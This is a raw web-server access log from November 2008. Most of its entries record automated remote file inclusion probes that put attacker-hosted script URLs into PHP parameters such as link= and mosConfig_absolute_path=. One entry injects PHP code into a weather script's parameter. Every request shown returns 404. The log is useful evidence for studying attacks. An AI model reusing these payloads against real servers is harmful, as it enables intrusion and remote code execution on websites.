88.84.145.169 - - [03/Nov/2008:02:19:23 -0600] "GET /logs/index.php?link=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
88.84.145.169 - - [03/Nov/2008:02:19:23 -0600] "GET /index.php?link=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
78.111.80.12 - - [03/Nov/2008:02:19:43 -0600] "GET /logs/index.php?link=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
78.111.80.12 - - [03/Nov/2008:02:19:43 -0600] "GET /index.php?link=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
77.221.151.34 - - [03/Nov/2008:02:19:44 -0600] "GET /logs/index.php?link=http://www.davemaster.com/dotproject/files//idv6.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
77.221.151.34 - - [03/Nov/2008:02:19:44 -0600] "GET /index.php?link=http://www.davemaster.com/dotproject/files//idv6.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
64.131.73.161 - - [03/Nov/2008:02:19:56 -0600] "GET /logs/index.php?link=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.816"
64.131.73.161 - - [03/Nov/2008:02:19:56 -0600] "GET /index.php?link=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.816"
64.131.73.161 - - [03/Nov/2008:02:20:10 -0600] "GET /index.php?link=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.816"
64.131.73.161 - - [03/Nov/2008:02:20:10 -0600] "GET /logs/index.php?link=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.816"
89.218.85.18 - - [03/Nov/2008:02:20:14 -0600] "GET /index.php?link=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:02:20:14 -0600] "GET /logs/index.php?link=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:02:20:16 -0600] "GET /index.php?link=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:02:20:16 -0600] "GET /logs/index.php?link=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
216.139.67.116 - - [03/Nov/2008:02:20:21 -0600] "GET /logs/index.php?link=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.64"
216.139.67.116 - - [03/Nov/2008:02:20:21 -0600] "GET /index.php?link=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.64"
79.170.90.64 - - [03/Nov/2008:02:20:33 -0600] "GET /index.php?link=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
79.170.90.64 - - [03/Nov/2008:02:20:33 -0600] "GET /logs/index.php?link=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
209.59.143.94 - - [03/Nov/2008:02:20:33 -0600] "GET /index.php?link=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
209.59.143.94 - - [03/Nov/2008:02:20:33 -0600] "GET /logs/index.php?link=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
79.170.90.64 - - [03/Nov/2008:02:20:39 -0600] "GET /logs/index.php?link=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
79.170.90.64 - - [03/Nov/2008:02:20:39 -0600] "GET /index.php?link=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
222.236.44.26 - - [03/Nov/2008:02:20:46 -0600] "GET /logs/index.php?link=http://gosgo.com/bbs/idxx.txt?????? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
222.236.44.26 - - [03/Nov/2008:02:20:47 -0600] "GET /index.php?link=http://gosgo.com/bbs/idxx.txt?????? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
208.75.224.226 - - [03/Nov/2008:02:20:52 -0600] "GET /logs/index.php?link=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
208.75.224.226 - - [03/Nov/2008:02:20:52 -0600] "GET /index.php?link=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
66.40.52.30 - - [03/Nov/2008:02:21:02 -0600] "GET /index.php?link=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:02:21:02 -0600] "GET /logs/index.php?link=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.800"
208.75.224.226 - - [03/Nov/2008:02:21:04 -0600] "GET /logs/index.php?link=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
208.75.224.226 - - [03/Nov/2008:02:21:04 -0600] "GET /index.php?link=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
69.72.144.18 - - [03/Nov/2008:02:21:42 -0600] "GET /index.php?link=http://geocities.com/ronikoe/z6id.txt?%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
69.72.144.18 - - [03/Nov/2008:02:21:42 -0600] "GET /logs/index.php?link=http://geocities.com/ronikoe/z6id.txt?%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
75.125.207.2 - - [03/Nov/2008:02:22:07 -0600] "GET /logs/index.php?link=http://www.splendidpicnic.com/tst.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
75.125.207.2 - - [03/Nov/2008:02:22:07 -0600] "GET /index.php?link=http://www.splendidpicnic.com/tst.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
75.125.207.2 - - [03/Nov/2008:02:22:08 -0600] "GET /logs/index.php?link=http://www.splendidpicnic.com/tst.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
75.125.207.2 - - [03/Nov/2008:02:22:09 -0600] "GET /index.php?link=http://www.splendidpicnic.com/tst.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
204.200.195.110 - - [03/Nov/2008:02:22:17 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://www.herbsall.4yz.com/images/b?? HTTP/1.1" 404 315 "-""libwww-perl/5.65"
204.200.195.110 - - [03/Nov/2008:02:22:17 -0600] "GET //include/admin.lib.inc.php?site_path=http://www.herbsall.4yz.com/images/b?? HTTP/1.1" 404 310 "-""libwww-perl/5.65"
213.171.37.206 - - [03/Nov/2008:02:22:21 -0600] "GET /logs/index.php?link=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.808"
213.171.37.206 - - [03/Nov/2008:02:22:22 -0600] "GET /index.php?link=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.808"
83.149.69.97 - - [03/Nov/2008:02:22:29 -0600] "GET /index.php?link=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:02:22:29 -0600] "GET /logs/index.php?link=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
213.171.37.206 - - [03/Nov/2008:02:22:37 -0600] "GET /logs/index.php?link=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.808"
213.171.37.206 - - [03/Nov/2008:02:22:38 -0600] "GET /index.php?link=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.808"
222.236.44.26 - - [03/Nov/2008:02:22:42 -0600] "GET /logs/access_log.1216339200/index.php?link=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
222.236.44.26 - - [03/Nov/2008:02:22:42 -0600] "GET /index.php?link=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
222.236.44.26 - - [03/Nov/2008:02:22:42 -0600] "GET /logs/index.php?link=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
222.236.44.26 - - [03/Nov/2008:02:22:42 -0600] "GET /logs/access_log.1215993600/index.php?link=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
89.218.85.18 - - [03/Nov/2008:02:23:19 -0600] "GET /logs/access_log.1216339200/index.php?link=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 320 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
89.218.85.18 - - [03/Nov/2008:02:23:19 -0600] "GET /index.php?link=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
89.218.85.18 - - [03/Nov/2008:02:23:19 -0600] "GET /logs/access_log.1215993600/index.php?link=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 320 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
89.218.85.18 - - [03/Nov/2008:02:23:19 -0600] "GET /logs/index.php?link=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
202.144.158.163 - - [03/Nov/2008:02:23:35 -0600] "GET /index.php?link=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
202.144.158.163 - - [03/Nov/2008:02:23:36 -0600] "GET /logs/index.php?link=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
222.236.44.26 - - [03/Nov/2008:02:24:43 -0600] "GET /logs/access_log.1216339200/index.php?link=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
222.236.44.26 - - [03/Nov/2008:02:24:43 -0600] "GET /index.php?link=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
222.236.44.26 - - [03/Nov/2008:02:24:43 -0600] "GET /logs/index.php?link=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
222.236.44.26 - - [03/Nov/2008:02:24:43 -0600] "GET /logs/access_log.1215993600/index.php?link=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
74.6.18.228 - - [03/Nov/2008:02:25:36 -0600] "GET /logs/access_log.1199318400 HTTP/1.0" 200 237926 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
203.86.233.109 - - [03/Nov/2008:02:27:39 -0600] "GET /logs/goalkick_main/index.php?link=http://www.tortuga-finance.com/includes/.../on.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
203.86.233.109 - - [03/Nov/2008:02:27:40 -0600] "GET /goalkick_main/index.php?link=http://www.tortuga-finance.com/includes/.../on.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
203.146.26.91 - - [03/Nov/2008:02:28:59 -0600] "GET /index.php?link=http://www.dumkerng.com/eshop/id.txt?????? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
203.146.26.91 - - [03/Nov/2008:02:28:59 -0600] "GET /logs/index.php?link=http://www.dumkerng.com/eshop/id.txt?????? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
203.86.233.109 - - [03/Nov/2008:02:30:11 -0600] "GET /logs/goalkick_main/index.php?link=http://www.tortuga-finance.com/includes/.../on.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
203.86.233.109 - - [03/Nov/2008:02:30:12 -0600] "GET /goalkick_main/index.php?link=http://www.tortuga-finance.com/includes/.../on.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
89.218.85.18 - - [03/Nov/2008:02:30:51 -0600] "GET /logs/index.php?link=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:02:30:51 -0600] "GET /index.php?link=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
203.146.15.54 - - [03/Nov/2008:02:30:55 -0600] "GET /index.php?link=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
203.146.15.54 - - [03/Nov/2008:02:30:55 -0600] "GET /logs/index.php?link=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
203.146.15.54 - - [03/Nov/2008:02:30:56 -0600] "GET /index.php?link=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
203.146.15.54 - - [03/Nov/2008:02:30:56 -0600] "GET /logs/access_log.1216339200/index.php?link=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
203.146.15.54 - - [03/Nov/2008:02:30:56 -0600] "GET /logs/index.php?link=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
203.146.15.54 - - [03/Nov/2008:02:30:56 -0600] "GET /logs/access_log.1215993600/index.php?link=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
203.146.15.54 - - [03/Nov/2008:02:30:59 -0600] "GET /logs/access_log.1216339200/index.php?link=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
203.146.15.54 - - [03/Nov/2008:02:30:59 -0600] "GET /logs/index.php?link=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
203.146.15.54 - - [03/Nov/2008:02:30:59 -0600] "GET /index.php?link=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
203.146.15.54 - - [03/Nov/2008:02:30:59 -0600] "GET /logs/access_log.1215993600/index.php?link=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
89.218.85.18 - - [03/Nov/2008:02:31:08 -0600] "GET /logs/index.php?link=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:02:31:08 -0600] "GET /index.php?link=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.72.144.18 - - [03/Nov/2008:02:31:39 -0600] "GET /logs/index.php?link= HTTP/1.1" 404 298 "-""libwww-perl/5.810"
69.72.144.18 - - [03/Nov/2008:02:31:39 -0600] "GET /index.php?link= HTTP/1.1" 404 293 "-""libwww-perl/5.810"
213.247.43.5 - - [03/Nov/2008:02:32:01 -0600] "GET /logs//index.php?option=com_akolegal&Itemid=&mosConfig_absolute_path=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.247.43.5 - - [03/Nov/2008:02:32:02 -0600] "GET //index.php?option=com_akolegal&Itemid=&mosConfig_absolute_path=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
203.146.15.54 - - [03/Nov/2008:02:32:02 -0600] "GET /logs/access_log.1215993600/index.php?link=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
79.170.90.64 - - [03/Nov/2008:02:32:43 -0600] "GET /logs/index.php?link=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
79.170.90.64 - - [03/Nov/2008:02:32:43 -0600] "GET /index.php?link=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
213.247.43.5 - - [03/Nov/2008:02:33:11 -0600] "GET /logs//index.php?option=com_akogallery&Itemid=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.247.43.5 - - [03/Nov/2008:02:33:11 -0600] "GET //index.php?option=com_akogallery&Itemid=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
189.32.61.208 - - [03/Nov/2008:02:34:23 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://www.herbsall.4yz.com/images/b?? HTTP/1.1" 404 315 "-""libwww-perl/5.808"
189.32.61.208 - - [03/Nov/2008:02:34:23 -0600] "GET //include/admin.lib.inc.php?site_path=http://www.herbsall.4yz.com/images/b?? HTTP/1.1" 404 310 "-""libwww-perl/5.808"
78.111.80.12 - - [03/Nov/2008:02:35:13 -0600] "GET /logs/index.php?link=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
78.111.80.12 - - [03/Nov/2008:02:35:13 -0600] "GET /index.php?link=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:02:35:25 -0600] "GET /index.php?link=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:02:35:25 -0600] "GET /logs/index.php?link=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:02:36:30 -0600] "GET /logs/access_log.1216339200/index.php?link=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 320 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
89.218.85.18 - - [03/Nov/2008:02:36:30 -0600] "GET /index.php?link=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
89.218.85.18 - - [03/Nov/2008:02:36:30 -0600] "GET /logs/index.php?link=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
89.218.85.18 - - [03/Nov/2008:02:36:38 -0600] "GET /logs/access_log.1215993600/index.php?link=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 320 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
77.221.151.34 - - [03/Nov/2008:02:36:49 -0600] "GET /logs/index.php?link=http://www.davemaster.com/dotproject/files//idv6.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
77.221.151.34 - - [03/Nov/2008:02:36:49 -0600] "GET /index.php?link=http://www.davemaster.com/dotproject/files//idv6.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
78.111.80.12 - - [03/Nov/2008:02:36:56 -0600] "GET /logs/index.php?link=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
78.111.80.12 - - [03/Nov/2008:02:36:56 -0600] "GET /index.php?link=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
70.85.192.194 - - [03/Nov/2008:02:37:48 -0600] "GET /logs/access_log.1208044800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
208.75.224.226 - - [03/Nov/2008:02:39:09 -0600] "GET /logs/access_log.1209427200//tiny_includes/config.php?dir_ws=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.811"
208.75.224.226 - - [03/Nov/2008:02:39:09 -0600] "GET /logs//tiny_includes/config.php?dir_ws=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
208.75.224.226 - - [03/Nov/2008:02:39:09 -0600] "GET //tiny_includes/config.php?dir_ws=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
208.75.224.226 - - [03/Nov/2008:02:39:10 -0600] "GET /logs/access_log.1196380800//tiny_includes/config.php?dir_ws=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.811"
64.131.73.161 - - [03/Nov/2008:02:39:12 -0600] "GET /logs/access_log.1209427200//tiny_includes/config.php?dir_ws=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.816"
64.131.73.161 - - [03/Nov/2008:02:39:12 -0600] "GET //tiny_includes/config.php?dir_ws=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.816"
64.131.73.161 - - [03/Nov/2008:02:39:12 -0600] "GET /logs//tiny_includes/config.php?dir_ws=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.816"
64.131.73.161 - - [03/Nov/2008:02:39:12 -0600] "GET /logs/access_log.1196380800//tiny_includes/config.php?dir_ws=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.816"
64.131.73.161 - - [03/Nov/2008:02:39:13 -0600] "GET /logs/access_log.1209427200//tiny_includes/config.php?dir_ws=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.816"
64.131.73.161 - - [03/Nov/2008:02:39:13 -0600] "GET //tiny_includes/config.php?dir_ws=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.816"
64.131.73.161 - - [03/Nov/2008:02:39:13 -0600] "GET /logs//tiny_includes/config.php?dir_ws=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.816"
64.131.73.161 - - [03/Nov/2008:02:39:13 -0600] "GET /logs/access_log.1196380800//tiny_includes/config.php?dir_ws=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.816"
69.72.144.18 - - [03/Nov/2008:02:39:18 -0600] "GET //tiny_includes/config.php?dir_ws=http://geocities.com/ronikoe/z6id.txt?%0D?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
69.72.144.18 - - [03/Nov/2008:02:39:18 -0600] "GET /logs/access_log.1196380800//tiny_includes/config.php?dir_ws=http://geocities.com/ronikoe/z6id.txt?%0D?? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
69.72.144.18 - - [03/Nov/2008:02:39:18 -0600] "GET /logs/access_log.1209427200//tiny_includes/config.php?dir_ws=http://geocities.com/ronikoe/z6id.txt?%0D?? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
69.72.144.18 - - [03/Nov/2008:02:39:18 -0600] "GET /logs//tiny_includes/config.php?dir_ws=http://geocities.com/ronikoe/z6id.txt?%0D?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
208.75.224.226 - - [03/Nov/2008:02:40:02 -0600] "GET /logs/access_log.1209427200//tiny_includes/config.php?dir_ws=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.811"
208.75.224.226 - - [03/Nov/2008:02:40:02 -0600] "GET /logs//tiny_includes/config.php?dir_ws=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
208.75.224.226 - - [03/Nov/2008:02:40:02 -0600] "GET //tiny_includes/config.php?dir_ws=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
208.75.224.226 - - [03/Nov/2008:02:40:02 -0600] "GET /logs/access_log.1196380800//tiny_includes/config.php?dir_ws=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.811"
62.87.154.41 - - [03/Nov/2008:02:43:02 -0600] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://akbars.jw.lt/id/header.jpg? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
62.87.154.41 - - [03/Nov/2008:02:43:02 -0600] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://akbars.jw.lt/id/header.jpg? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
87.230.0.157 - - [03/Nov/2008:02:45:24 -0600] "GET /logs/index.php?site=http://www.mykr.net/bbs/id.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.76"
87.230.0.157 - - [03/Nov/2008:02:45:24 -0600] "GET /index.php?site=http://www.mykr.net/bbs/id.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.76"
207.150.183.60 - - [03/Nov/2008:02:45:53 -0600] "GET /logs/index.php?link=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
207.150.183.60 - - [03/Nov/2008:02:45:53 -0600] "GET /index.php?link=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.150.183.60 - - [03/Nov/2008:02:51:56 -0600] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
207.150.183.60 - - [03/Nov/2008:02:51:56 -0600] "GET /logs/access_log.1216425600//admin/business_inc/saveserver.php?thisdir=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
207.150.183.60 - - [03/Nov/2008:02:51:57 -0600] "GET //admin/business_inc/saveserver.php?thisdir=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
66.197.201.69 - - [03/Nov/2008:02:52:25 -0600] "GET /logs/access_log.1214179200//PhpLinkExchange/bits_listings.php?svr_rootP=http://igamevillage.com//ray/modules/global/id.txt?%0D?? HTTP/1.1" 404 345 "-""libwww-perl/5.65"
